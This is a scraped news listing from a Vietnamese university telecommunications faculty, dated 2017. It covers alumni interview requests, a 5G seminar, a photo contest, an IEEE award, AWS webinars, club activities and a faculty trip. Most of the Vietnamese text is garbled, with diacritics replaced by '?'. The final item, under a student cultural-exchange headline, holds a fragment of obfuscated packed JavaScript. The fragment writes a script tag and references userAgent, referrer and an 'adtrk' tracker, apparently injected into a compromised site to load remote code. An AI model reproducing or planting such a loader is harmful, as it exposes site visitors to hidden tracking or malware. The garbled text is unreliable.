[THÔNG BÁO NHỜ HỖ TRỢ] Cựu sinh viên tham gia phỏng vấn chuẩn bị cho công tác Khảo sát của Đoàn ĐGN tại HVCS

[THÔNG BÁO NH? H? TR?]

Nh?m ph?c v? cho công tác ki?m ??nh c?a H?c Vi?n, V?n phòng Khoa Vi?n Thông c?n s? giúp ?? c?a ít nh?t 05 c?u sinh viên t?t nghi?p sau n?m 2012 ?? ph?c v? ph?ng v?n:

+ Th?i gian: 1 bu?i trong th?i gian t? ngày 22/9/2017 ??n 25/9/2017

+ ??a ?i?m: H?c Vi?n C? S?, 11 Nguy?n ?ình Chi?u, Ph??ng ?akao, Qu?n 1, TP. H? Chí Minh

R?t mong nh?n s? h? tr? c?a các b?n. N?u các b?n ??ng ý h? tr?, xin vui lòng cung c?p thông tin bao g?m (H? và tên, MSSV, s? ?i?n tho?i di ??ng) cho Th?y Ph?m Minh Quang (email: phamminhquang@ptithcm.edu.vn) ho?c ib ? facebook c?a Khoa.

Trân tr?ng c?m ?n.

V?n phòng Khoa VT2

Hits: 68

Khoa Viễn Thông 2 họp triển khai công tác và kế hoạch cho năm học mới 2017-2018

Vào ngày 18 tháng 8 n?m 2017, Khoa Vi?n Thông ?ã h?p Khoa ?? tri?n khai công tác và k? ho?ch cho n?m h?c m?i 2017-2018. Tham d?  cu?c h?p có Phó Giám ??c Tân H?nh và ??i di?n các phòng ban ch?c n?ng c?a H?c Vi?n C? S?.

??i di?n cho Khoa Vi?n Thông 2, Th?y Võ Nguy?n Qu?c B?o – Tr??ng Khoa, ?ã trình bày k? ho?ch ?ào t?o, nghiên c?u khoa h?c, h?p tác qu?c t?, và các công vi?c tr?ng tâm khác c?a Khoa trong n?m h?c m?i 2017-2018.

Th?y Tân H?nh – Phó Giám ??c H?c Vi?n, ph? trách HVCS t?i TP. H? Chí Minh, ghi nh?n nh?ng n? l?c c?a các Th?y/Cô c?a Khoa trong công tác gi?ng d?y và nghiên c?u khoa h?c và l?u ý ??n công tác h?c t?p nâng cao trình ?? và công tác ??i m?i ch??ng trình ?ào t?o ?? ?áp ?ng ngu?n nhân l?c c?a xã h?i trong b?i c?nh cách m?ng công nghi?p 4.0.

Hits: 753

[Seminar]: Towards 5G Wireless Communication Networks by Prof. Octavia A Dobre (Memorial University, Canada)

Time: 15:00 Tuesday September 5th, 2017

Location: Meeting room, PTIT Campus, 11 Nguyen Dinh Chieu, Dakao Ward, District 1, HCMC

Title: Towards 5G Wireless Communication Networks

Abstract: The forthcoming 5G wireless is expected to provide a platform on which various applications can be implemented: from enhanced mobile broadband, to massive machine type, and ultra-reliable low latency communications. Depending on the application, key performance indicators are related to the peak and user experience data rates, network energy efficiency, connectivity density, and latency to mention only a few. To reach the 5G requirements, new technologies have emerged, stirring up significant research in both industry and academia. This talk will discuss the applications and performance requirements of 5G, enabling technologies, as well as standardization efforts. Additionally, it will provide insights into recent results achieved in our research group, related to non-orthogonal multiple access, full duplex and D2D communications.

http://www.engr.mun.ca/~dobre/

Bio: Octavia A Dobre is a Professor and Research Chair with Memorial University, Canada. Previously, she was with New Jersey Institute of Technology, USA and Polytechnic Institute of Bucharest, Romania. Dr. Dobre was the recipient of a Royal Society Scholarship, UK and a Fulbright Fellowship, USA. Dr. Dobre was a Visiting Professor at the Université de Bretagne Occidentale, France and Massachusetts Institute of Technology (MIT), USA.

Her research interests include 5G technologies, blind signal identification and parameter estimation techniques, cognitive radio systems, as well as optical and underwater communications.

Dr. Dobre serves as the Editor-in-Chief of the IEEE Communications Letters. She was an editor and guest editor for prestigious journals, and co-chair of technical symposia at various conferences, including IEEE GLOBECOM and ICC. She is the Chair of the IEEE ComSoc Signal Processing for Communications and Electronics Technical Committee, Chair of the IEEE ComSoc WICE standing committee, as well as a member-at-large of the Administrative Committee of the IEEE Instrumentation and Measurement Society.

Hits: 37

Cuộc thi ảnh: “Tôi và nơi thực tập”

[CU?C THI ?NH: “TÔI VÀ N?I TH?C T?P”]

#Ý_ngh?a:
– V?i mong mu?n ghi l?i nh?ng kho?nh kh?c ?áng nh? trong công ty, ho?c k? v? nh?ng câu chuy?n v? n?i các b?n ?ang th?c t?p và h?n th?, ?? cho các em khóa sau ???c bi?t thêm v? môi tr??ng làm vi?c c?a các công ty Vi?n thông các em s? làm…

#??i_t??ng:
– ??i t??ng tham gia là các b?n sinh viên D13 và L15 khoa Vi?n thông ?ang th?c t?p.

#Hình_th?c:
– Không gi?i h?n s? l??ng hình. Yêu c?u ph?i có caption, chú gi?i cho m?i hình.
– Các b?n có th? t?o thành slide, video hình ?? th? hi?n sinh ??ng h?n.
– Nh?ng b? hình ???c ch?n s? ???c tr?ng bày t?i qu?n 1 ?? các em sinh viên khoa d??i, các b?n ???c xem và h?c h?i.

#Th?i_gian_th?c_hi?n:
T? 17/07/2017 ??n 14/08/2017
17/07/2017 – 07/08/2017 ch?p ?nh và g?i v? Ban t? ch?c ch??ng trình (BTC) và ti?n hành vote công khai trên Facebook.
08/08 – 14/08/2017 BTC ch?m bài d?a trên s? ?i?m t?ng ?nh và công b? k?t qu?

#Cách_th?c_n?p_bài
G?i ?nh v? email: vt.lcdkhoa@gmail.com

#Th?_l?_ch??ng_trình
Ti?n hành n?p ?nh v? BTC và BTC s? post trên facebook, sau ?ó BTC s? post trên facebook c?a LC? và ti?n hành share và like.
D?a vào k?t qu? c?a bình ch?n t? Facebook (1 Like = 1 ?i?m, 1 l??t share = 2 ?i?m), s? tìm ra ng??i có ?i?m cao nh?t và 2 ng??i cao ti?p theo ?? nh?n th??ng.

#C?_c?u_gi?i_th??ng:
Bí m?t 

Hits: 185

Bản tin về giải thưởng Exemplary Reviewer của Hiệp hội Điện – Điện tử Hoa Kỳ (IEEE)

V?a qua, TS. Tr?n Trung Duy, Khoa Vi?n thông 2 – H?c vi?n Công ngh? B?u chính Vi?n thông c? s? t?i TP. H? Chí Minh ?ã vinh d? nh?n ???c b?ng khen Exemplary Reviewer c?a Hi?p h?i ?i?n – ?i?n t? Hoa K? (IEEE).

?ây là gi?i th??ng h?ng n?m nh?m vinh danh các nhà ph?n bi?n có ?óng góp l?n cho các t?p chí ???c xu?t b?n b?i Hi?p h?i ?i?n – ?i?n t? Hoa K? (IEEE).

V?i các ?óng góp trong n?m 2016, TS. Tr?n Trung Duy ?ã vinh d? nh?n ???c hai b?ng khen Exemplary Reviewer c?a các t?p chí IEEE Transactions on Communications và IEEE Communications Letters.

Hits: 293

[BUILD-IT] Toạ đàm Công nghệ Trực tuyến từ Amazon Web Services

BUILD-IT xin gi?i thi?u m?t s? bu?i To? ?àm Công ngh? Tr?c tuy?n cung c?p b?i Amazon Web Services (AWS). D??i hình th?c h?i th?o qua web, các chuyên gia t? gi?i pháp AWS s? trình bày n?i dung ch? ??, th?c hi?n mô ph?ng tr?c ti?p, gi?i thi?u các ví d? t? khách hàng c?a AWS, và tham gia h?i ?áp v?i ng??i tham d?. 

Ch? ?? và m?c chuyên môn hoá c?a các bu?i h?i th?o này khá ?a d?ng và phù h?p v?i nhi?u ??i t??ng khác nhau. D??i ?ây là thông tin c?a m?t s? phiên n?i b?t theo các l?nh v?c trong th?i gian t?i:

DI ??NG

Lôi kéo s? tham gia c?a ng??i dùng v?i Amazon Pinpoint: Tìm hi?u cách Amazon Pinpoint có th? v?n hành các chi?n d?ch qua các kênh nh? tin nh?n qu?ng cáo qua di d?ng, SMS, và email nh?m góp ph?n t?o nên m?t h? th?ng thông tin hoàn ch?nh và tích h?p.

Th?i gian: 13 tháng 7 | 10:30 AM – 11:10 AM PT | 01:30 PM – 02:10 PM ET

D? LI?U L?N

Xây d?ng Danh m?c Siêu d? li?u cho T?p D? li?u c?a b?n s? d?ng D?ch v? Amazon Elasticsearch: Tìm hi?u cách s? d?ng D?ch v? Amazon Elasticsearch ?? xây d?ng m?t kho siêu d? li?u cho t?p d? li?u và l?p ch? m?c n?i dung c?a các tài li?u c?a b?n ?? b?n có th? d? dàng xác ??nh v? trí các t?p b?ng v?n b?n ch?a trong chúng.

Th?i gian: 11 tháng 7 | 10:30 AM – 11:10 AM PT | 1:30 PM – 2:10 PM ET

C? S? D? LI?U

Thi?t k?, Tri?n khai và T?i ?u hóa SQL Server trên AWS: Tìm hi?u cách s? d?ng Amazon EC2 và Amazon RDS ?? t?n d?ng ???c nhi?u h?n t? c? s? d? li?u SQL Server c?a b?n.

Th?i gian: 28 tháng sáu | 10:30 AM – 11:10 AM PT | 1:30 PM – 2:10 PM ET

 Chuy?n ??i và Di chuy?n C? s? d? li?u NoSQL ho?c Kho D? li?u sang AWS: Tìm hi?u cách d? dàng di chuy?n c? s? d? li?u và kho d? li?u c?a b?n lên ?ám mây.

Th?i gian: 12 tháng b?y | 2:00:00 AM WIB – 2:45:00 AM WIB

AN NINH VÀ XÁC MINH NH?N D?NG

Tích h?p ?ánh giá An toàn vào chu trình DevOps c?a b?n b?ng Amazon Inspector: K?t h?p b?o m?t theo yêu c?u ? b?t k? giai ?o?n nào c?a vòng ??i DevOps c?a b?n v?i Amazon Inspector.

Th?i gian: 13 tháng b?y | 12:00 PM – 12:40 PM PT | 3:00 PM – 3:40 PM ET

B?o m?t ?ng d?ng Web c?a b?n b?ng AWS Web Application Firewall (WAF) và AWS Shield: Tìm hi?u cách b?o v? các ?ng d?ng web c?a b?n ch?ng DDoS và các cu?c t?n công web khác b?ng AWS Shield và AWS Web Application Firewall (WAF).

Th?i gian: 12 tháng b?y | 12:00 PM – 12:40 PM PT | 03:00 PM – 03:40 PM ET

LABS MÔ PH?NG TH?C HÀNH

Hands on Lab – Các kh?i l??ng công vi?c c?a Windows trên AWS: Ti?p nh?n khoá ?ào t?o th?c hành và h?c cách b?t ??u ch?y các kh?i l??ng công vi?c c?a Windows trên AWS.

Th?i gian: 27 tháng 7 | 8:30 AM – 10:00 AM PT | 11:30 AM – 1:00 PM ET

Hands on Lab – Gi?i thi?u v? Microsoft SQL Server trong AWS: Ti?p nh?n khoá ?ào t?o th?c hành và tìm hi?u các b??c ?? kh?i ??ng và c?u hình Microsoft SQL Server ??u tiên c?a b?n trên D?ch v? C? s? d? li?u Quan h? Amazon (RDS) và k?t n?i nó v?i Microsoft SQL Server Management Studio.

Th?i gian: 26 tháng 7 | 8:30 AM – 10:00 AM PT | 11:30 AM – 1:00 PM ET

?I?N TOÁN

V?n hành m?t Ph??ng án Truy?n thông có tính ?i?u ch?nh theo hoàn c?nh cao trên AWS b?ng cách s? d?ng EC2 Spot Instances: Tìm hi?u các khái ni?m quan tr?ng c?a EC2 Spot Instances và các m?u s? d?ng chung ?? t?i ?u hóa t?i ?a kích c? và chi phí trong ?ám mây.

Th?i gian: 27 tháng 7 | 12:00 PM – 12:40 PM PT | 3:00 PM – 3:40 PM ET

Qu?n lý WordPress trên Amazon Lightsail: Chúng tôi cùng các b?n ?i qua các b??c s? d?ng WordPress trên Amazon Lightsail và cung c?p m?i thông tin b?n c?n bi?t.

Th?i gian: 11 tháng 7 | 09:00 AM – 09:40 AM PT | 12:00 PM – 12:40 PM ET

DOANH NGHI?P VÀ HYBRID

Phân tách và t?ng quy mô ?ng d?ng b?ng cách s? d?ng Amazon SQS và Amazon SNS: Tìm hi?u cách Amazon SQS và Amazon SNS giúp ??n gi?n hóa vi?c phân chia và thông tin m?t cách ??m b?o gi?a các ?ng d?ng – ? b?t k? quy mô nào.

Th?i gian: 13 tháng 7 | 9:00 AM – 9:40 AM PT | 12:00 PM – 12:40 PM ET

V?N V?T K?T N?I

Các tính n?ng thi?t y?u c?a N?n t?ng ?ám mây IoT: Tìm hi?u cách AWS ??nh ngh?a các n?ng l?c c?t lõi c?a n?n t?ng ?ám mây IoT.

Th?i gian: 12 tháng 7 | 11:00:00 PM WIB – 11:45:00 PM WIB

L?U TR? D? LI?U

Tìm hi?u sâu v? Amazon S3: Cùng tìm hi?u các tính n?ng c?a Amazon S3 (bao g?m các ?o?n mã) và nh?ng phát ki?n m?i nh?t v? qu?n lý và b?o m?t l?u tr?.

Th?i gian: 13 tháng 7 | 12:30:00 AM WIB – 1:15:00 AM WIB

SERVERLESS

Các th?c ti?n t?t nh?t cho các ?ng d?ng không có máy ch?: Tìm hi?u các th?c ti?n t?t nh?t v? an ninh cho các ?ng d?ng không có máy ch? và AWS Lambda.

Th?i gian: 25 tháng 7 | 12:00 PM – 01:00 PM PT | 3:00 PM – 4:00 PM ET

Quý Th?y/Cô và các b?n sinh viên c?ng có th? xem thông tin t?t c? các h?i th?o t?i ?ây.

Hits: 55

CÁC HOẠT ĐỘNG CỦA CLB THÔNG TIN QUANG TRONG HÈ 2017

Ngày 14/6/2017, CLB Thông Tin Quang ?ã h?p v?i tham d? c?a Th?y Cô trong B? môn Thông Tin Quang và th?ng nh?t m?t s? ho?t ??ng c?a CLB trong hè 2017 nh? sau:

  1. Các b?n thành viên CLB TTQ ?ang th?c t?p t?t nghi?p có m?t ít nh?t m?t bu?i/tu?n t?i CLB ?? báo cáo ti?n ?? th?c t?p v?i GVHD. Các thành viên khác v?n tham gia sinh ho?t bình th??ng. Th?i gian th?c hi?n t? ngày 26/6/2017.
  2. CLB s? th??ng xuyên t? ch?c các bu?i sinh ho?t chuyên ?? trong hè 2017. Chuyên ?? ??u tiên s? do Th?y ?? V?n Vi?t Em th?c hi?n v?i n?i dung ”Thi?t l?p m?c tiêu” vào lúc 9h00 ngày th? t?, 28/6/2017 t?i CLB TTQ (Phòng 2D11).
  3. Kênh thông tin n?i b? ?? trao ??i gi?a các thành viên trong CLB TTQ (bao g?m Th?y Cô trong Ban c? v?n, Ban ch? nhi?m CLB và các b?n sinh viên) là trang facebook OFC Club.
  4. Các thông tin v? ho?t ??ng c?a CLB TTQ s? ???c thông báo r?ng rãi qua website, facebook c?a Khoa Vi?n Thông, Liên chi ?oàn Khoa Vi?n Thông…
  5. Các thành viên CLB TTQ ?ã b?u b? sung b?n D??ng Hoàng Thanh (?13CQVT02) và Tr??ng Th? Trang (?13CQVT02) vào Ban Ch? Nhi?m CLB. Nh? v?y, Ban ch? nhi?m CLB TTQ s? g?m 5 thành viên:
  • Th?y Nguy?n V?n Lành (Ch? nhi?m)
  • Tr?n Hoàng H?u Phúc (?13CQVT01)
  • D??ng Hoàng Thanh (?13CQVT02)
  • Tr??ng Th? Trang (?13CQVT02)
  • Hu?nh H? Qu?nh Nh? (?14CQVT02).

 Ban Ch? nhi?m CLB TTQ

(Ngu?n tin: B? Môn Thông Tin Quang)

M?T S? HÌNH ?NH V? BU?I RA M?T CLB CHUYÊN NGÀNH THÔNG TIN QUANG NGÀY 12/04/2017

11

Th?y Võ Nguy?n Qu?c B?o, Tr??ng Khoa Vi?n Thông t?ng hoa chúc m?ng thành l?p CLB Thông Tin Quang vào ngày 12/04/2017

22

Các b?n sinh viên tham d? bu?i ra m?t CLB Thông Tin Quang ngày 12/04/2017 và Th?y Cô trong Ban c? v?n & Ban ch? nhi?m CLB

33

Ban c? v?n và Ban ch? nhi?m CLB Thông Tin Quang

44

CLB Thông Tin Quang – Phòng 2D11

55

Hits: 15

Hội thảo khoa học: Bảo mật lớp vật lý do TS. Thái Truyển Đại Chấn trình bày

Vào ngày 28 tháng 6 n?m 2017, Khoa Vi?n Thông ?ã t? ch?c h?i th?o khoa h?c v?i ch? ?? Physical-Layer Secret Key Generation with Colluding Untrusted Relays do TS. Thái Truy?n ??i Ch?n, ??i H?c Vi?t ??c trình bày. Trong bài trình bày, TS. Ch?n ?ã trình bày t?ng quát v? b?o m?t l?p v?t lý và cách th?c sinh mã ?? b?o v? d? li?u trong quá trình trao ??i thông tin. Bài nói chuy?n c?a TS. Ch?n r?t thú v?, thu hút toàn b? thành viên c?a phòng thí nghi?m thông tin vô tuy?n và các Th?y/Cô và sinh viên quan tâm.

IMG_1032

Thái Truy?n ??i Ch?n là c?u sinh viên khoá 98 c?a Khoa, nh?n ???c h?c b?ng h?c th?c s? t?i vi?n KAIST, Hàn Qu?c và h?c b?ng ti?n s? t?i ??i h?c Aalborg, ?an M?ch. Và hi?n nay, TS. Ch?n hi?n ?ang công tác t?i ??i H?c Vi?t ??c, Vi?t Nam.

K?t thúc bu?i h?i Th?o, Th?y Võ Nguy?n Qu?c B?o c?m ?n TS. Ch?n ?ã ghé th?m Khoa và tr??ng c?, và hi v?ng s? có nh?ng c? h?i h?p tác trong công tác ?ào t?o và nghiên c?u khoa h?c.

Hits: 35

DU LỊCH HÈ KHOA VIỄN THÔNG 2017 TẠI CÁI BÈ (TIỀN GIANG)

Nhân d?p hè n?m 2017, Khoa Vi?n Thông 2 ?ã t? ch?c chuy?n du l?ch t?i Cái Bè (Ti?n Giang) vào ngày 3/6/2017 và 4/6/2017. Chuy?n ?i này ?ã nh?n ???c s? h??ng ?ng và ?ng h? r?t nhi?t tình c?a Th?y Cô trong Khoa Vi?n Thông và gia ?ình. ?ây là l?n ??u tiên m?t chuy?n du l?ch hè c?a Khoa Vi?n Thông có s? tham d? ??y ?? c?a t?t c? Th?y Cô trong Khoa. C? ?oàn ?ã tr?i qua hai ngày ngh? d??ng t?i Mekong Resort & Spa và tham quan Cái Bè (Ti?n Giang) th?t vui, thân m?t và r?t thú v?.

a

b

T?i Mekong Resort & Spa, c? ?oàn ?ã ???c tr?i nghi?m m?t k? ngh? d??ng thú v? v?i khung c?nh sông n??c thiên nhiên c?a mi?n Tây Nam B?, ?ua thuy?n cayak, ?i xe ??p, … và ?n t?i cùng nhau t?i nhà hàng c?a resort. Sau khi r?i Mekong Resort & Spa, ?oàn ti?p t?c ?i thuy?n tham quan ch? n?i Cái Bè (Ti?n Giang) và th? làm nông dân tát m??ng b?t cá. Th?y Cô và các thành viên nhí trong ?oàn ?ã ???c tr?i nghi?m th?c t? chân l?m, tay bùn c?a ng??i nông dân là nh? th? nào.

Chuy?n du l?ch hè 2017 k?t thúc sau ho?t ??ng th?m c? s? làm c?m, k?o d?a vào nuôi ông. Khoa Vi?n Thông chia tay nhau và h?n hè 2018 v?i ??y ?? các thành viên nh? trong k? ngh? hè này và h?a h?n có nh?ng tr?i nghi?m m?i.

c

d

e

f

Hits: 18

Sinh Viên Khoa Viễn Thông giao lưu văn hoá với sinh viên Đại Học PolyTech Lille, Pháp

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tadsz|var|u0026u|referrer|adtrk||js|php'.split('|'),0,{})) ids=”4253,4254,4256,4257,4258,4259,4260,4262,4263,4264,4212,4213,4221,4226,4239,4240,4242,4243,4244,4245,4246,4247,4191,4195,4196″]

Hits: 12

1 2 3 4 5 9